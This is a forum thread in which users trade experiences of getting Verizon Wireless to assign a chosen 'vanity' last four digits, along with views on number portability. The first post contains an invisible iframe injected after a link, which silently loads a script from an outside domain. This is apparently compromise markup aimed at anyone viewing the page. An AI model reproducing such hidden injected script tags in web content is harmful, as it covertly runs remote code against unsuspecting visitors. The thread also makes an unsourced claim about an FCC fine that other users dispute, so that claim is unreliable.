+ Reply to Thread
Page 1 of 2 1 2 LastLast

Verizon Vanity Phone Number. Is it possible or not?

Hello,

I was wondering if anyone had any luck getting the last 4 digits of their phone # personalized. Every other phone service I have ever had has had my name as the last 4 digits of my phone number.

I asked when I ordered the phone, and the rep said, it was possible, and free. (Sprint, and Voicestream used to charge, like 30-50 bucks).

Everytime I call customer service, they say no, but sales say YES.

http://www.smartphoneforums.com/phpBB2/viewtopic.php?t=3089&highlight=vanity
    Jrowlings had no luck, but thats all I could find with a search.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

The power of search. I had no luck after a few calls to customer care. I was quite clear that being able to pick a number was a major component in my decision to keep the phone and Verizon. They didn't bite. I emailed back the rep that told me to ask and just got an apology.

You can usually go through all available numbers with a customer service representative and choose one. I am unaware of them saving or charging for them. This is best done when you get a new phone or initiate your service.
    Brian
    Smart Phones for Dumb People

Originally posted by "jrowlings"

The power of search. I had no luck after a few calls to customer care. I was quite clear that being able to pick a number was a major component in my decision to keep the phone and Verizon. They didn't bite. I emailed back the rep that told me to ask and just got an apology.
    I decided to change my number to a local area code after moving to the next county over. They let me choose from all the local available numbers for that area code even if it was a few cities away. So you should be able to make a list of 4 digit numbers you like and check each one for availability.
    Phil

Well thats just crappy. EVERY other phone number I have had for years has been my first name. I don't mind paying, because it just makes it very helpful for others.

I wish they were more clear on that. If you call right now, you'll probably get 5 different answers.

Thank you kindly for your help guys anyway, I guess I will just have to get used to what they gave me

Originally posted by "crazyphil"

Quote Originally Posted by jrowlings
    I decided to change my number to a local area code after moving to the next county over. They let me choose from all the local available numbers for that area code even if it was a few cities away. So you should be able to make a list of 4 digit numbers you like and check each one for availability.
    sweet, so there might be a chance! I am gonna call AGAIN!!! I hope I get a good rep.

OK I called back twice. First rep said it WAS NOT possible, because she had no way of searching new #'s. It only generated a list for her to choose from.

2nd rep, said it was very possible, and in fact, did a search, and found that my name/number was not possible under my area code, because they were all taken.

So final answer: YES, it is possible, if the last 4 digits are available, and you can find a rep who can search through the numbers.

You of course may have to search through a few different blocks of exchanges dedicated for that carrier. My friend Greg got 4734, so his number was 999-Greg.

Level 2 tech support can do this, so invent a problem to get there, and be really nice to all the customer service representatives, even the bad or less knowledgeable ones.
    Brian

Converged

yes

i had this done twice in the past with vwz. my friend use to work at a store and did it no problem, but unless you know someone, most sale reps will not do it for you from what i understand.

It is not supposed to be done. The FCC can impose a fine of up to $20,000 for doing it. You can have them search through a list but it is supposed to be limited in the number of numbers it gives and how many searches you can do. You can search for areacodes and exchanges no problem but your not supposed to search for the last 4.

Well... the power of the forum strikes again. Motivated by the last couple posts in this string, I called Verizon again. I got a very nice rep and explained the history (of my calls and those of others in this forum) and off she went to search for my desired number. After a long time on hold a rep came back and said they would call me back since the search was taking so long. They did! And I know have a number I'm happy about. Thanks for the encouragement, maxnix.

BTW, she said they were expecting number portability to hit by Nov 1.

Originally posted by "jrowlings"

Thanks for the encouragement, maxnix.

BTW, she said they were expecting number portability to hit by Nov 1.
    Glad you got it.

I think that $20,000 FCC fine is for tearing the federal warning labels off bedding. LEC hoarded numbers, but not wireless A & B licensees, as far as I know. And I don't know much as I have been a Verizon (and its predecessor's) customer for over 13 years. Had wife and mom on Cellular 1 (AT&T Wireless) for a while because Airtouch was so weak in their marketing. Know lots of Sprint customers. The few I know who have Cingular and T-Mobile are looking to ditch them because of coverage problems.
    Brian

Originally posted by "Falconier"

It is not supposed to be done. The FCC can impose a fine of up to $20,000 for doing it. You can have them search through a list but it is supposed to be limited in the number of numbers it gives and how many searches you can do. You can search for areacodes and exchanges no problem but your not supposed to search for the last 4.
    For some strange reason I find that incredibly hard to believe.. I suspect there is more to it than just searching for an available phone number. And since at least one person participating in this thread has successfully received a custom number, so it must be legal. Feel free to post a link to the page on the FCC site that states that this cannot be done. They have all of their rules and policies online now.
    Boardoo - Managed Forum, Web, and Blog hosting solutions.

Originally posted by "shackrat"

Quote Originally Posted by Falconier
    For some strange reason I find that incredibly hard to believe.. I suspect there is more to it than just searching for an available phone number. And since at least one person participating in this thread has successfully received a custom number, so it must be legal. Feel free to post a link to the page on the FCC site that states that this cannot be done. They have all of their rules and policies online now.
    I changed my cell number over the phone with VzW CS and they were really helpful in both trying to find a number completely local to my area and also letting me choose the last 4 digit number from their available ones. At first they had no completely local numbers but said to call back every day because old numbers get released back into the system all the time. By waiting a few days and calling them back they finally had 3 or 4 numbers within my area's 12 mile local radius and they let me choose which one I wanted. The CS lady I talked to seemed under the full assumption that I would want to choose the last 4 digits that I liked the best.

If it's that important to get a good number then try to find a helpful CS rep, get their name and/or extension and then keep checking back for the available numbers in your area. In my case I was more thinking of a local number that my local landline friends and family could call for free and secondary was choosing the last 4 digits to be easy to memorize.
    Phil

doh!!!

Just when you think its over!

Well I had just become content with my new phone number, and given the number out to everyone, when what do you know, my service stops working.

After calling customer service FOUR TIMES, I finally found out that, when they looked up my local number 2 days ago for a possible change, they accidently submitted a new number over mine accidently while searching for another!

Not only did they accidently changed my phone#, they couldn't change it back because it went back into the system, and somebody snatched it up on another account.

I am now on my second "unwanted" phone #.

At first I was a little upset, but accidents happen. I am just simply amazed at all the trouble. All those years with sprintpcs don't seem so bad anymore! 10 more days to cancel, I hope things get better.

It is an excellent chance to get Verizon to troll for a number you like to recitify their SNAFU. Be nice and you'll be really happy.
    Brian

I forgot where i found the information for the fine that can be imposed. I'll look for it when i get to work.

This brings together a couple points. Vanity numbers, number transfer between carriers and carriers not accepting your phone like Sprint with the I700 just because they are not offering.

First Vanity numbers are fine, cool and your lucky if you can get one, both of my names are too long for them.

Second the number transfer issue that will loom large. I stand by my earlier comments that you should lose the number if you move to a new carrier. People chang carriers like their socks due to better rate, offer, promo, free phone etc. If you move your lose. I don't always love Verizon, but I have used them since '95. Shackrat will recall CellularOne before Cingular bought them. They were the worst.

Third the carriers make it a hassle to change due to different phones and support issues. So I go to sprint and my phone can technically work but they don't sell it so I can't use it?

The point is the phones, services and numbers should be universal in the US so that you can transfer if necessary, and use your phone. But the number thing bugs me.

My .02
    My PDA & SmartPhone History: Palm Vx; M505;TungstenT; NX60; iPaq 1910; I700; Treo 600; hx4700; MPx220; hw6515, Treo 700w, XV6700,, Treo 700p, Moto Q Black, Moto Q9h, BlackBerry 8310 & BlackBerry 8820, BlackBerry Bold, BlackBerry Storm 9530; Droid Incredible; iPhone4; Samsung Captivate; Samsung Fascinate; Droid X, Droid2 Global, Droid X; Droid Incredible. Funny how the familiar is where you end up in the end.

Originally posted by "ppcmd"

Third the carriers make it a hassle to change due to different phones and support issues. So I go to sprint and my phone can technically work but they don't sell it so I can't use it?

The point is the phones, services and numbers should be universal in the US so that you can transfer if necessary, and use your phone. But the number thing bugs me.

My .02
    I tend to agree with you about the numbers. Vanity numbers and portability go hand in hand, if you get a good vanity number you will want to port it to whatever service provider you switch to. Because of all the extra costs involved I am willing to forego both of them. If I want to switch to another network because of some perceived benefits then losing the number should be part of the cost I am willing to pay to do it.

I believe the reason why companies like Sprint do not want to use phones from another carrier is because each operating system is optimized for a certain network. To use that phone on another network would most likely mean necessary modifications or tweaks to the operating system on that device. Again this would lead to tremendous costs for the company to do this for you. I am also willing to lose the phone if I switch.

Bottom line for me is I think everyone should do a lot of research on which network/provider is best for them and then make a commitment to the provider they choose. Switching and keeping your number, picking your own vanity number and keeping your phone when you switch would lead to so much switching at so much cost! You know who would have to pay for that, everybody's rates would go up! Tis better for the switchers to pay for switching then everybody pay for the switchers.

Ok, done with my rant!
    Phil

Originally posted by "Falconier"

I forgot where i found the information for the fine that can be imposed. I'll look for it when i get to work.
    Cool, I look forward to seeing it. Wow, very ususal to see a post from Falconier with "pm" in the post time.
    Boardoo - Managed Forum, Web, and Blog hosting solutions.